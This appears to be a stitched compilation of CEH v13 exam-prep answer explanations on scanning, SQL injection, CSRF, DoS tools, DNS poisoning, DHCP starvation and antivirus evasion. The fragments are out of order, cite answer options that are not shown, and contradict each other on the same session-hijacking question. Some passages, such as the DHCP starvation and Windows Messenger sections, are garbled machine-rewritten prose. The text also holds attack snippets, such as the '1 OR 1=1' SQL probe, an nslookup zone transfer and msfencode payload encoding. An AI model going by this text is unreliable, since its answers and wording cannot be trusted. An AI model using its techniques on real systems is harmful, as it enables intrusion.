C. Use Hex encoding to represent the SQL query string: This option is not feasible because Hex encoding is a method of representing binary data in hexadecimal format, such as ‘0x41’ for ‘A’. Hex encoding does not work for SQL queries, as the SQL engine would not be able to interpret the hexadecimal values as valid SQL syntax. Moreover, Hex encoding would not help evade the IDS signature detection, as the IDS would still be able to decode the hexadecimal values and match the signature of a typical SQL injection pattern.

The command nmap -sX initiates what is known as a Xmas Scan. This type of scan is used to analyze how a target system responds to TCP packets with unusual flag combinations, helping the attacker identify live hosts and open ports without completing a full TCP handshake.

In the Xmas scan, three specific TCP flags are set in the packet:

URG (Urgent)

PSH (Push)

FIN (Finish)

This combination makes the packet appear "lit up like a Christmas tree," hence the name Xmas scan. These packets are sent to target ports to observe the system’s behavior, especially when it does not follow standard RFC 793 behavior.

Closed ports will usually respond with a RST (reset).

Open ports may not respond at all, depending on the operating system and configuration.

This method is typically used to evade detection by firewalls and intrusion detection systems that expect normal TCP traffic patterns.

Reference – CEH v13 Official Study Guide:

Module 03: Scanning Networks, Section: “TCP Scan Types”, Subsection: “Xmas Tree Scan”, Page Reference: typically listed under TCP Flag Scanning Techniques.

CEH v13 iLabs and practical guidance in CEH Engage also cover this scan in reconnaissance simulations.

Incorrect Options Explained:

A. SYN scan (-sS) sets only the SYN flag.

C. ACK scan (-sA) sets the ACK flag.

D. SYN and ACK flags are used in TCP handshake, not in Xmas scan.

CEH v13 identifies URL parameters used in dynamic SQL queries as common injection points. When user-controlled values are passed directly into database queries without validation, attackers can manipulate query logic. Injecting a test payload such as 1 OR 1=1 into the userID parameter is a standard method to determine whether the application concatenates input into SQL statements. If the page displays all user orders instead of only the authenticated user's orders, this confirms SQL injection. CEH teaches that conditional tautologies are one of the safest and most reliable ways to probe SQL vulnerabilities, especially in GET parameters. JavaScript injection (Option A) tests XSS, not SQLi. Directory traversal (Option C) targets filesystem issues, not database logic. Brute-forcing user credentials (Option D) does not test query sanitization. Therefore, modifying the userID parameter with a SQL injection payload is the correct CEH-aligned method.

QUESTION NO: 1 [Web Application Hacking]

During a red team exercise, a Certified Ethical Hacker (CEH) is attempting to exploit a potential vulnerability in a target organization’s web server. The CEH has completed the information gathering and footprinting phases and has mirrored the website for offline analysis. It has also been discovered that the server is vulnerable to session hijacking. Which of the following steps is most likely to be part of a successful attack methodology while minimizing the possibility of detection?

A. Hijack an active session and immediately modify server configuration files.

B. Attempt SQL injection to extract sensitive database information.

C. Perform vulnerability scanning using automated tools to identify additional weaknesses.

D. Launch a direct brute-force attack to crack the server’s administrative password.

Answer: B

According to the Certified Ethical Hacker (CEH) attack methodology, once reconnaissance, footprinting, and website mirroring have been completed, the attacker proceeds cautiously to exploitation while maintaining stealth. CEH documentation emphasizes that low-noise, application-layer attacks are preferable when the objective is to minimize detection.

Option B, attempting SQL Injection, aligns directly with CEH’s Web Application Hacking module. SQL Injection is a server-side attack that can often be executed through normal-looking HTTP requests, making it less likely to trigger intrusion detection systems (IDS) or security alerts. CEH materials highlight SQL injection as a common and effective technique for extracting sensitive data such as usernames, passwords, and business-critical information without disrupting server operations.

Option A is incorrect because immediately modifying server configuration files after session hijacking significantly increases the risk of detection. CEH guidelines stress post-exploitation restraint, especially during red team operations.

Option C is not ideal at this stage because automated vulnerability scanners generate substantial traffic and are highly detectable. CEH explicitly notes that vulnerability scanning is noisy and often logged.

Option D is the least stealthy option. Brute-force attacks generate numerous failed authentication attempts, triggering security alerts and account lockouts. CEH classifies brute-force attacks as high-risk and easily detectable.

Therefore, SQL Injection represents the most effective and stealthy next step in accordance with CEH’s structured attack lifecycle.

The ntpq utility provides detailed NTP peer information, synchronization states, offsets, delays, and strata. CEH specifically lists ntpq as the tool for querying NTP daemon status and enumerating peer relationships, making it essential for reconnaissance and lateral movement mapping.

CEH v13 describes Cross-Site Request Forgery (CSRF) as a technique that forces authenticated users to unknowingly execute actions within a web application without their intent. Unlike session hijacking methods that require stealing or replaying session cookies, CSRF exploits the trust relationship that the server has with a user's browser. Even with HTTPS, secure cookies, and MFA, once a user is authenticated, the browser automatically sends session cookies with each request. If the attacker convinces the victim to load a maliciously crafted webpage or URL, the browser sends a forged request to the target application, executing actions under the user’s authenticated session. CEH notes that secure cookies and MFA do not stop CSRF because no credentials are stolen—only forced actions occur. This technique is sophisticated because it leaves minimal traces, avoids direct cookie manipulation, bypasses robust authentication mechanisms, and leverages design weaknesses rather than technical misconfigurations. Protection typically requires anti-CSRF tokens and proper origin validation.

In a professional penetration test or vulnerability assessment, the most efficient and effective way to discover vulnerabilities on a Windows-based system is to use an automated vulnerability scanning tool such as Nessus.

Nessus is a widely used vulnerability scanner developed by Tenable. It performs comprehensive scans across systems to identify:

Missing patches and updates

Misconfigurations

Weak or default credentials

Known vulnerabilities and associated CVEs

Outdated software versions

CEH v13 course material emphasizes the use of tools like Nessus, OpenVAS, and Qualys during the Vulnerability Analysis phase of ethical hacking engagements.

From CEH v13 Official Study Guide (Module 05: Vulnerability Analysis):

“Vulnerability scanning tools such as Nessus and OpenVAS are used to automatically identify known vulnerabilities in systems, including operating systems, applications, and services. These tools correlate identified issues with CVE entries and offer severity ratings based on CVSS scores.”

Incorrect Options Explained:

A. The Windows Update tool only updates the operating system and Microsoft applications. It is not designed to detect security flaws or vulnerabilities comprehensively.

C. MITRE.org is an excellent source of information for known vulnerabilities (CVEs), but it does not scan systems or detect vulnerabilities in a target environment.

D. Creating a disk image is useful for forensic purposes or backup, but it does not help in actively identifying vulnerabilities in a live system.

Reference – CEH v13 Study Guide:

Module 05: Vulnerability Analysis

Section: “Vulnerability Assessment Tools”

CEH iLabs Exercise: “Using Nessus to Perform Vulnerability Scanning”

Comprehensive and Detailed Explanation From CEH v13 Guide:

R-U-Dead-Yet? (RUDY) is a DoS tool that targets web applications by sending slow HTTP POST requests with large Content-Length headers. This consumes server resources, leading to a denial of service.

CEH v13 Reference:

Module 9: Denial-of-Service – DoS Tools

“R-U-Dead-Yet? (RUDY) sends long-form POST requests to consume server-side sessions and exhaust resources without completing the transaction.”

The scenario describes an injection attack involving Server Side Includes (SSI). SSI directives are instructions placed in web pages that are executed by the web server before the page is sent to the user. If user input is improperly validated and directly used in an SSI-enabled environment, attackers can inject malicious SSI directives (such as file manipulation commands).

From CEH v13 Official Courseware:

Server-Side Includes (SSI) Injection occurs when attackers submit specially crafted input that is included in server responses and interpreted as SSI directives.

These directives can perform dangerous actions like:

Reading sensitive files (e.g., /etc/passwd)

Deleting or modifying files

Running shell commands via #exec directive

Incorrect options:

A. Server-side template injection is related to template engines like Jinja2 or Twig.

B. Server-side JS injection applies to environments like Node.js.

C. CRLF injection manipulates HTTP headers, not SSI parsing.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Injection Flaws”

Subsection: “SSI Injection”

Lab Reference: CEH iLabs – Web Application Exploitation

=

CEH v13 classifies application-layer DoS attacks as the most difficult to detect and mitigate. A distributed SQL injection-based DoS exploits database query processing by overwhelming backend systems with malicious but syntactically valid requests.

Unlike volumetric attacks, this method generates low-bandwidth, high-impact traffic that appears legitimate. Traditional DDoS protections often fail to identify such traffic, especially when it targets authenticated services like online banking.

UDP floods, Smurf attacks, and ICMP-based attacks are well-known and more easily mitigated with rate limiting and filtering. Zero-day exploits cause service disruption but are not primarily DoS techniques.

CEH v13 highlights that application-layer DoS attacks blend seamlessly with normal traffic patterns, making them exceptionally challenging. Thus, option A is correct.

This scenario describes a Slowloris attack, a classic application-layer DoS attack covered in CEH v13 Network and Perimeter Hacking. Slowloris works by opening many HTTP connections and sending data very slowly, preventing the server from closing the connections.

Because the connections appear legitimate, the server keeps them open, eventually exhausting its connection pool. This causes legitimate users to experience timeouts and service unavailability—exactly as described.

ICMP and UDP floods consume bandwidth, which was ruled out. Fragmentation attacks target packet handling, not application-layer sessions.

CEH v13 highlights Slowloris as particularly dangerous because it requires minimal bandwidth and bypasses many traditional DoS defenses. Therefore, Option A is correct.

In a man-in-the-middle (MITM) attack, an attacker intercepts communication between two parties and can read, alter, or inject data without either party knowing. Susan's actions — intercepting and modifying her boss's session data before relaying it to the server — is the classic MITM pattern.

From CEH v13 Official Courseware:

Module 8: Sniffing

Module 11: Session Hijacking

CEH v13 Study Guide states:

“In a MITM attack, the attacker positions themselves between two communicating parties, relaying and possibly altering communications while maintaining the illusion that the parties are communicating directly.”

Incorrect Options:

A: Sniffing only involves passive listening.

B: Spoofing may involve impersonation but not necessarily interception and relay.

D: DoS is about service disruption, not data interception.

To block NetBIOS and related Windows networking traffic from traversing a firewall (especially from external sources), you should block the following ports:

Port 135 (TCP/UDP): Microsoft RPC endpoint mapper (DCOM/RPC)

Port 139 (TCP): NetBIOS Session Service

Port 445 (TCP): Direct-hosted SMB over TCP/IP (Windows 2000+)

These ports are commonly used for:

File sharing

RPC-based communication

Windows network services

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Module 4: Enumeration

CEH v13 Study Guide states:

“To prevent external enumeration, remote file sharing, and NetBIOS attacks, administrators should block inbound access to ports 135, 139, and 445 on the firewall.”

Incorrect Options:

A (110): POP3 mail service

D (161): SNMP

F (1024): High ephemeral port; not specific to NetBIOS

Docker uses a client-server design. The docker client talks to the docker daemon, that will the work of building, running, and distributing your docker containers. The docker client and daemon will run on the same system, otherwise you will connect a docker consumer to a remote docker daemon. The docker consumer and daemon communicate using a REST API, over OS sockets or a network interface.

The docker daemon (dockerd) listens for docker API requests and manages docker objects like pictures, containers, networks, and volumes. A daemon may communicate with other daemons to manage docker services.

ISAPI (Internet Server Application Programming Interface) filters are DLLs used to extend the functionality of Microsoft IIS (Internet Information Services). If unnecessary or outdated ISAPI filters are enabled, they can introduce vulnerabilities or backdoors that attackers may exploit to launch web server-based attacks.

From the CEH v13 Official Courseware:

Module 14: Hacking Web Servers

Section: Web Server Vulnerabilities

Subsection: Common Web Server Misconfigurations

CEH v13 states:

“Unnecessary ISAPI filters and extensions should be disabled or removed, as they may introduce unneeded attack surfaces on the web server. Attackers may exploit vulnerabilities in these filters to gain unauthorized access, execute code remotely, or escalate privileges on the server.”

This is part of a broader hardening strategy to reduce the web server’s attack surface.

Incorrect Options:

A. Social engineering involves manipulating people, not software vulnerabilities.

C. Jailbreaking refers to bypassing restrictions on mobile devices.

D. Wireless attacks are unrelated to web server software components.

A low-and-slow scanning technique spreads probe attempts over long intervals, reducing the chance of triggering IDS signatures that rely on detecting rapid or high-volume scans. CEH highlights timing-based evasion as an effective method for reconnaissance against networks with strict perimeter controls.

In this scenario, users outside the organization (like Smith and Joseph on dial-up) see the defaced site, while Joseph on the internal corporate network sees the legitimate site. Tripwire confirms that the files on the actual web server are intact. This clearly indicates that the attack was not on the server itself, but rather on how external users are being directed to a malicious server.

This behavior is indicative of a DNS poisoning attack. The attacker poisoned the DNS cache of an external DNS resolver, redirecting to a malicious server. Internal DNS servers, unaffected by the poisoning, still resolved to the correct IP address.

From CEH v13:

Module 3: DNS Poisoning and Spoofing

Module 5: Vulnerability Analysis

CEH v13 Study Guide states:

“DNS poisoning involves injecting false information into a DNS resolver’s cache, causing users to be redirected to malicious websites without changing the actual web server’s content.”

Incorrect Options:

A: ARP spoofing affects local network address resolution, not global DNS.

B: SQL injection is used to exploit databases, not alter DNS records.

D: Routing table injection affects traffic routes, but wouldn’t explain DNS-level redirection discrepancies.

CEH materials explain that modern web applications deploy multiple layers of security—HTTPS, secure cookies, HttpOnly flags, and strict session regeneration—to defend against standard hijacking methods such as token theft through XSS or fixation. When these protections are properly implemented, attackers must compromise the underlying trust relationship between the client and server to successfully intercept or manipulate session tokens. One of the most advanced techniques described in CEH is compromising a trusted certificate authority or injecting a forged certificate into the victim’s trust store. This enables the attacker to perform a transparent MITM attack despite HTTPS protections. Because the victim’s browser trusts the forged certificate, encrypted traffic—including session tokens—is exposed to the attacker without generating browser warnings or IDS alerts. Timing side-channel attacks are not considered session hijacking methods; XSS is mitigated by secure flags; and session fixation is ineffective when session regeneration occurs. Therefore, compromising a trusted certificate authority to enable an undetectable MITM attack is the most viable method.

One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. Msfencode is a useful tool that alters the code in an executable so that it looks different to antivirus software but will still run the same way. Much as the binary attachment in email is encoded in Base64, msfencode encodes the original executable in a new binary. Then, when the executable is run, msfencode decodes the original code into memory and exe-cutes it.

CEH teaches that ARP-based attacks vary in sophistication from basic poisoning to more specialized techniques such as switch port stealing. In environments where ARP poisoning defenses or inspection tools limit traditional attacks, attackers may exploit timing vulnerabilities in ARP reply behavior. Switch port stealing works by sending spoofed ARP replies at precisely the right moment—before the legitimate ARP response from the target host—causing the switch’s CAM table to update temporarily and associate the target’s IP address with the attacker’s MAC address. CEH emphasizes that switches trust the latest ARP update, so even brief timing windows enable partial packet interception. This is different from fully persistent ARP poisoning, which continuously overwrites ARP tables, and from passive sniffing, which cannot capture unicast traffic on a switched network. This attack is particularly useful when ARP spoofing is mitigated because it relies on opportunistic timing rather than full table poisoning. The intermittent nature of intercepted packets matches CEH’s description of switch port stealing behavior.

CEH v13 highlights the Idle Scan as one of the stealthiest reconnaissance methods available, designed specifically to avoid detection by IDS and security monitoring tools. Idle scanning leverages a “zombie host”—a system with a predictable IPID sequence—to route all probe packets through it. Since no packets ever originate directly from the attacker’s IP, IDS systems are unable to attribute the port scan to the attacker. CEH emphasizes that this technique creates zero direct traffic between the attacker and the target, making it extremely evasive and ideal for highly monitored networks. FIN scans (Option A) are somewhat stealthy but still originate from the attacker and are detectable. TCP Connect scans (Option C) are the most detectable because they complete full connections. ICMP Echo scans (Option D) are easily logged and flagged by IDS. Idle scanning is uniquely suited for bypassing advanced detection systems while still identifying open ports and live hosts.

This scenario clearly describes Load Balancing as a DDoS mitigation strategy, which is covered under the CEH v13 Network and Perimeter Hacking module. Load balancing distributes incoming network or application traffic across multiple servers or resources to prevent any single system from becoming overwhelmed.

According to CEH v13, modern DDoS mitigation architectures often combine hardware load balancers with cloud-based scrubbing centers or Content Delivery Networks (CDNs). These systems absorb high traffic volumes and ensure availability by spreading requests across multiple nodes. This approach aligns perfectly with the organization’s strategy of absorbing and distributing traffic rather than blocking it outright.

Other options are incorrect:

Black hole routing drops all traffic, including legitimate traffic.

Rate limiting restricts traffic volume rather than distributing it.

Sinkholing redirects traffic for analysis, not load distribution.

CEH v13 highlights the importance of route tracing during internal reconnaissance to identify key infrastructure devices such as distribution switches, firewalls, and core routers. When a single IP address consistently appears as the penultimate hop across multiple network paths, this typically indicates that the device serves as a core router responsible for inter-VLAN or inter-subnet routing. Core routers aggregate traffic from various segments before forwarding to endpoint subnets, explaining why it appears before diverse destinations. CEH emphasizes recognizing core infrastructure because compromising such devices provides attackers with significant visibility and potential control over network-wide communications. DNS poisoning would affect name resolution, not hop patterns. Loopback misconfigurations would affect single hosts, not multiple segments. A transparent proxy would appear only for traffic routed through application-layer inspection, not all traceroute tests. The consistency across subnets strongly points to a centralized routing device.

Vulnerability scanning solutions perform vulnerability penetration tests on the organizational network in three steps:

1. Locating nodes: The first step in vulnerability scanning is to locate live hosts in the target network using various scanning techniques.

2. Performing service and OS discovery on them: After detecting the live hosts in the target network, the next step is to enumerate the open ports and services and the operating system on the target systems.

3. Testing those services and OS for known vulnerabilities: Finally, after identifying the open services and the operating system running on the target nodes, they are tested for known vulnerabilities.

While the question as shown appears slightly misformatted, this closely resembles the Windows command:

ping -t 192.168.0.101

Here:

-t means to ping continuously until manually stopped.

In the question: ping -* 6 192.168.0.101, the * is most likely a placeholder or typographical error. Based on CEH format questions and how command-line flags work in ping, -t is the correct flag.

Option A. t – Correct (ping continuously)

Why Others Are Incorrect:

B. s: Not a valid option in Windows ping.

C. a: Used to resolve the hostname from an IP (not related to this).

D. n: Specifies the number of echo requests to send.

When a user encrypts plaintext with PGP, PGP first compresses the plaintext. The session key works with a very secure, fast conventional encryption algorithm to encrypt the plaintext; the result is ciphertext. Once the data is encrypted, the session key is then encrypted to the recipient's public key

Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.

PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a username or an e-mail address.

Public key encryption uses two different keys. One key is used to encrypt the information and the other is used to decrypt the information. Sometimes this is referred to as asymmetric encryption because two keys are required to make the system and/or process work securely. One key is known as the public key and should be shared by the owner with anyone who will be securely communicating with the key owner. However, the owner’s secret key is not to be shared and considered a private key. If the private key is shared with unauthorized recipients, the encryption mechanisms protecting the information must be considered compromised.

DNS spoofing is a threat that copies the legitimate server destinations to divert the domain's traffic. Ignorant these attacks, the users are redirected to malicious websites, which results in insensitive and personal data being leaked. It is a method of attack where your DNS server is tricked into saving a fake DNS entry. This will make the DNS server recall a fake site for you, thereby posing a threat to vital information stored on your server or computer.

The cache poisoning codes are often found in URLs sent through spam emails. These emails are sent to prompt users to click on the URL, which infects their computer. When the computer is poisoned, it will divert you to a fake IP address that looks like a real thing. This way, the threats are injected into your systems as well.

Different Stages of Attack of DNS Cache Poisoning:

- The attacker proceeds to send DNS queries to the DNS resolver, which forwards the Root/TLD authoritative DNS server request and awaits an answer.

- The attacker overloads the DNS with poisoned responses that contain several IP addresses of the malicious website. To be accepted by the DNS resolver, the attacker's response should match a port number and the query ID field before the DNS response. Also, the attackers can force its response to increasing their chance of success.

- If you are a legitimate user who queries this DNS resolver, you will get a poisoned response from the cache, and you will be automatically redirected to the malicious website.

According to CEH v13 System Hacking and Web Application Hacking, once reconnaissance and footprinting are complete, attackers typically move into controlled exploitation while maintaining stealth. Since the CEH has already identified a session hijacking vulnerability, leveraging that weakness is the most logical and stealthy progression.

Session hijacking allows attackers to impersonate legitimate users without triggering authentication alerts, making it significantly less detectable than brute-force or scanning activities. Option B aligns with CEH methodology: hijacking a valid session provides authorized-level access, which can then be abused to make configuration changes discreetly.

SQL injection (Option A) may trigger database errors and IDS alerts. Brute-force attacks (Option C) are noisy and easily logged. Automated vulnerability scanning (Option D) generates excessive traffic and is typically avoided once exploitation begins.

CEH v13 emphasizes using already-identified weaknesses and minimizing footprint during exploitation. Therefore, Option B is correct.

CEH materials describe RDDoS (Ransom DDoS) attacks as threat-driven extortion campaigns where attackers demand payment and demonstrate capability by launching a short-lived DDoS burst. The purpose is to intimidate the victim into paying before a larger, sustained attack begins. The attack described uses HTTP floods with incomplete POST requests—an application-layer DDoS technique that consumes server resources by forcing the target to hold open connections. This kind of demonstration followed by an extortion email aligns precisely with RDDoS behavior. DRDoS attacks involve reflection/amplification through third-party servers, which is not occurring here. Pulse wave attacks use timed bursts and do not involve extortion, while recursive GET floods do not match the incomplete POST behavior. Therefore, the correct classification is RDDoS.

Comprehensive and Detailed Explanation:

The correct nslookup syntax to perform a zone transfer is:

ls -d domain_name

So, from the nslookup prompt:

server 192.168.10.2

ls -d abccorp.local

This will attempt to list all DNS records for the abccorp.local domain from the specified server, if zone transfers are permitted.

From CEH v13 Courseware:

Module 4: Enumeration → DNS Zone Transfers

Cross-Site Request Forgery (CSRF) is covered in CEH v13 Module 12: Hacking Web Applications. It occurs when an attacker tricks a victim’s browser into making unintended, authenticated requests to a web application where the victim is already logged in.

Example:

User logs in to a banking site.

While logged in, the attacker sends the user a crafted link that submits a transaction via a hidden request.

Since the user’s session cookies are valid, the bank processes the request.

Why Other Options Are Incorrect:

A. Session hijacking: Steals session tokens but doesn’t involve forcing browser actions.

B. SSRF: Server sends a request to an internal service, not via user's browser.

D. XSS: Executes scripts in the user’s browser but doesn't force HTTP requests under the user’s identity.

<03>

Windows Messenger administration

Courier administration is an organization based framework notice Windows administration by Microsoft that was remembered for some prior forms of Microsoft Windows.

This resigned innovation, despite the fact that it has a comparable name, isn’t connected in any capacity to the later, Internet-based Microsoft Messenger administration for texting or to Windows Messenger and Windows Live Messenger (earlier named MSN Messenger) customer programming.

The Messenger Service was initially intended for use by framework managers to tell Windows clients about their networks.[1] It has been utilized malevolently to introduce spring up commercials to clients over the Internet (by utilizing mass-informing frameworks which sent an ideal message to a predetermined scope of IP addresses). Despite the fact that Windows XP incorporates a firewall, it isn’t empowered naturally. Along these lines, numerous clients got such messages. Because of this maltreatment, the Messenger Service has been debilitated as a matter of course in Windows XP Service Pack 2.

In CEH v13 Module 03: Scanning Networks, Nmap includes timing templates for controlling the speed and stealthiness of scans.

-T5: Insane mode – very fast, highly aggressive, easily detectable.

-T0: Paranoid mode – very slow and stealthy.

-O: Enables OS detection (not related to scan speed).

-A: Enables OS detection, version detection, script scanning, and traceroute (comprehensive but not specifically about speed).

Therefore:

If speed is your goal and you are not concerned about detection, then:

-T5 is the correct answer.

CHNTPW (Change NT Password) is a Linux-based utility that allows attackers or administrators to:

Reset Windows user account passwords

Unlock disabled or locked user accounts

Remove password protection without knowing the original password

It works by editing the Windows SAM (Security Account Manager) file located in the Windows system directory.

Reference – CEH v13 Official Study Guide:

Module 5: System Hacking

Quote:

“CHNTPW is a tool that can reset or change passwords on Windows systems by directly editing the SAM database. It is commonly run from a Linux LiveCD.”

Incorrect Options:

A. John the Ripper is for cracking passwords, not resetting them directly.

B. SET (Social Engineering Toolkit) is for phishing and payloads, not password resets.

D. Cain & Abel is a password recovery tool for Windows but runs on Windows, not Linux.

=

Shellshock (CVE-2014-6271) is a vulnerability in the GNU Bash (Bourne Again Shell) that allows remote code execution via crafted environment variables. It was disclosed in 2014 and had a wide impact on systems that relied on Bash as a command-line shell interpreter.

Affected systems include:

Linux distributions (Red Hat, Debian, CentOS, Ubuntu, etc.)

Unix variants (e.g., FreeBSD, OpenBSD, etc.)

Apple macOS (formerly OS X), since it uses Bash as the default shell

Windows systems were not directly affected because they do not use Bash by default. Bash is not a native component of Windows operating systems, and Shellshock exploits Bash-specific behavior. Only Windows systems where Bash was manually installed through a third-party method or environment (e.g., Cygwin) might be susceptible — but by default, Windows systems are immune.

Incorrect options:

A. Linux — Affected

B. Unix — Affected

C. OS X — Affected

D. Windows — Not directly affected (Correct answer)

When using exploits, you might gain access as only a local user. This limits what you can do on the target machine. You can use Meterpreters 'getsystem` command to elevate your permissions from a local administrator to SYSTEM. This works by using three elevation techniques.

The CEH Cryptanalysis module describes differential cryptanalysis as an attack that studies the relationship between differences in input and resulting differences in output to recover secret keys.

Option A precisely matches this definition.

Option B relies on execution timing.

Option C requires ciphertext manipulation.

Option D exhaustively tests keys.

CEH lists differential cryptanalysis as a foundational theoretical attack.

Gathering Wordlist from the Target Website An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier. # Cewl (P.200/184)

A DHCP starvation assault is a pernicious computerized assault that objectives DHCP workers. During a DHCP assault, an unfriendly entertainer floods a DHCP worker with false DISCOVER bundles until the DHCP worker debilitates its stock of IP addresses. When that occurs, the aggressor can deny genuine organization clients administration, or even stock an other DHCP association that prompts a Man-in-the-Middle (MITM) assault.

In a DHCP Starvation assault, a threatening entertainer sends a huge load of false DISCOVER parcels until the DHCP worker thinks they’ve used their accessible pool. Customers searching for IP tends to find that there are no IP addresses for them, and they’re refused assistance. Furthermore, they may search for an alternate DHCP worker, one which the unfriendly entertainer may give. What’s more, utilizing a threatening or sham IP address, that unfriendly entertainer would now be able to peruse all the traffic that customer sends and gets.

In an unfriendly climate, where we have a malevolent machine running some sort of an instrument like Yersinia, there could be a machine that sends DHCP DISCOVER bundles. This malevolent customer doesn’t send a modest bunch – it sends a great many vindictive DISCOVER bundles utilizing sham, made-up MAC addresses as the source MAC address for each solicitation.

In the event that the DHCP worker reacts to every one of these false DHCP DISCOVER parcels, the whole IP address pool could be exhausted, and that DHCP worker could trust it has no more IP delivers to bring to the table to legitimate DHCP demands.

When a DHCP worker has no more IP delivers to bring to the table, ordinarily the following thing to happen would be for the aggressor to get their own DHCP worker. This maverick DHCP worker at that point starts giving out IP addresses.

The advantage of that to the assailant is that if a false DHCP worker is distributing IP addresses, including default DNS and door data, customers who utilize those IP delivers and begin to utilize that default passage would now be able to be directed through the aggressor’s machine. That is all that an unfriendly entertainer requires to play out a man-in-the-center (MITM) assault.

The CEH v13 courseware states that insecure communication occurs when mobile applications transmit sensitive data over unencrypted or weakly encrypted channels, exposing information to interception. When an application uses plain HTTP or does not properly validate certificates, attackers can place themselves between the client and server using a man-in-the-middle (MitM) attack. This allows them to read session tokens, credentials, API keys, or personal user data as it travels across the network. CEH materials emphasize that MitM attacks are the primary exploitation technique for insecure data transmission because they exploit weaknesses in transport-layer security rather than weaknesses in backend code or authentication mechanisms. SQL injection and CSRF attacks target web application logic, not transport encryption. Brute-force attacks target authentication mechanisms and are unrelated to how data is transmitted. Therefore, the most effective exploitation method is intercepting traffic via MitM to capture or manipulate unencrypted communications.

"Attackers also use DNS lookup tools such as DNSdumpster.com, Bluto, and Domain Dossier to retrieve DNS records for a specified domain or hostname. These tools retrieve information such as domains and IP addresses, domain Whois records, DNS records, and network Whois records." CEH Module 02 Page 138

CEH v13 explains that packet fragmentation is a classic and effective IDS evasion technique. By breaking malicious payloads into smaller fragments, attackers attempt to prevent the IDS from reconstructing the full packet stream correctly, thereby avoiding signature detection.

Many IDS systems rely on packet reassembly and pattern matching. Fragmented packets can confuse or overload the reassembly process, especially if the IDS is poorly configured. CEH v13 specifically lists fragmentation, overlapping fragments, and out-of-order packets as evasion techniques used to bypass network defenses.

Option B describes malware propagation, not IDS evasion. Option C is a social engineering attack, unrelated to IDS detection. Option D is a denial-of-service attempt, not a stealth evasion method.

CEH v13 highlights that defending against fragmentation-based evasion requires proper normalization and reassembly configuration in IDS/IPS systems. Therefore, Option A is the correct answer.

Sniffing attacks are a type of network attack that involves intercepting and analyzing data packets as they travel over a network. Sniffing attacks can be used to steal sensitive information, such as usernames, passwords, credit card numbers, etc. Sniffing attacks can also be used to perform reconnaissance, spoofing, or man-in-the-middle attacks.

The IT department of the company has implemented some security measures to prevent or mitigate sniffing attacks, such as:

Adding the MAC address of the gateway to the ARP cache: This prevents ARP spoofing, which is a technique that allows an attacker to redirect network traffic to their own device by sending fake ARP messages that associate their MAC address with the IP address of the gateway.

Switching to IPv6 instead of IPv4: This reduces the risk of IP spoofing, which is a technique that allows an attacker to send packets with a forged source IP address, pretending to be another device on the network.

Using encrypted sessions such as SSH instead of Telnet, and Secure File Transfer Protocol instead of FTP: This protects the data from being read or modified by an attacker who can capture the packets, as the data is encrypted and authenticated using cryptographic protocols.

However, these measures are not enough to completely eliminate the threat of sniffing, as an attacker can still use other techniques, such as:

Passive sniffing: This involves monitoring the network traffic without injecting any packets or altering the data. Passive sniffing can be done on a shared network, such as a hub, or on a switched network, using techniques such as MAC flooding, port mirroring, or VLAN hopping.

Active sniffing: This involves injecting packets or modifying the data to manipulate the network behavior or gain access to more traffic. Active sniffing can be done using techniques such as DHCP spoofing, DNS poisoning, ICMP redirection, or TCP session hijacking.

Therefore, the next step to enhance network security is to implement network scanning and monitoring tools, which can help detect and prevent sniffing attacks by:

Scanning the network for unauthorized devices, such as rogue access points, hubs, or sniffers, and removing them or isolating them from the network.

Monitoring the network for abnormal traffic patterns, such as excessive ARP requests, DNS queries, ICMP messages, or TCP connections, and alerting the network administrators or blocking the suspicious sources.

Analyzing the network traffic for malicious content, such as malware, phishing, or exfiltration, and filtering or quarantining the infected or compromised devices.

LAN Manager (LM) hashes use the DES (Data Encryption Standard) algorithm to hash passwords. Here's how LM hashing works:

The password is converted to uppercase and padded/truncated to 14 characters.

Split into two 7-character halves.

Each half is used as a DES key to encrypt a constant string ("KGS!@#$%")—resulting in a 16-byte LM hash.

From CEH v13 Courseware:

Module 6: Malware Threats

Topic: Windows Password Storage & Cracking

CEH v13 Study Guide states:

“LM hashes use the DES encryption algorithm to create password hashes. Due to this method, they are highly vulnerable to brute-force attacks, particularly because they split the password into two 7-character blocks.”

Incorrect Options:

A: MD4 is used in NTLM hashes.

C: SHA is not used in LM.

D: SSL is a transport security protocol, not a hashing algorithm.

According to the Certified Ethical Hacker (CEH) System Hacking and Session Hijacking module, sidejacking is a form of session hijacking where an attacker passively intercepts network traffic to capture unencrypted session cookies. These cookies are then reused to impersonate the authenticated user without needing credentials.

CEH documentation explains that sidejacking commonly occurs on unencrypted HTTP connections, public Wi-Fi networks, or improperly secured internal networks. Once the session cookie is stolen, the attacker can replay it to gain access to the victim’s active session.

Option B correctly describes this mechanism and directly matches CEH’s definition of sidejacking.

Option A refers to perimeter exploitation, not session hijacking.

Option C describes social engineering, which is unrelated to sidejacking.

Option D is an example of cross-site scripting (XSS), not sidejacking.

CEH emphasizes HTTPS enforcement and secure cookie attributes as key countermeasures.

Static Network Address Translation (Static NAT) allows a single private IP address to be mapped to a single public IP address. This one-to-one mapping ensures that the same internal machine is always reachable through the same external IP address, which is crucial for "server publishing" — making internal servers (e.g., web servers, FTP servers) accessible from the internet.

From CEH v13 Courseware:

Module 03: Scanning Networks

Topic: Network Address Translation

Section: Types of NAT

CEH v13 Study Guide states:

“Static NAT provides a fixed translation of a private IP address to a public IP address. It is commonly used when an internal server must always be accessible from the Internet using a consistent IP address — this is known as server publishing.”

Incorrect Options:

A. Overloading PAT: Multiple private IPs share a single public IP using port numbers — not suited for static mappings.

B. Dynamic PAT: Similar to overloading; used for outbound traffic only.

C. Dynamic NAT: Assigns a public IP from a pool; the mapping can change, not suitable for server publishing.

